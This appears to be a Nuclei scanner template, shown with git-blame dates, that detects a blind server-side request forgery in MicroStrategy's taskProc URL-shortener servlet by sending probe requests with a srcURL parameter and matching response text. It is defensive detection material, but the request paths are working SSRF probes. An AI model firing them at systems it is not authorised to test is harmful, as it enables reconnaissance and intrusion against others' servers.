nuclei-templates/http/vulnerabilities/other/microstrategy-ssrf.yaml

26 lines
833 B
YAML
Raw Normal View History

2020-07-02 13:53:41 +00:00
id: microstrategy-ssrf
2021-08-18 19:13:44 +00:00
2020-07-02 13:53:41 +00:00
info:
name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind)
2020-07-02 13:53:41 +00:00
author: organiccrap
severity: high
description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener.
reference:
- https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
tags: microstrategy,ssrf
http:
2020-07-02 13:53:41 +00:00
- method: GET
path:
- '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
- '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
2021-10-17 02:16:32 +00:00
2021-10-16 20:19:30 +00:00
stop-at-first-match: true
2020-07-02 13:53:41 +00:00
matchers:
- type: word
words:
- taskResponse
- The source URL is not valid
condition: and
part: body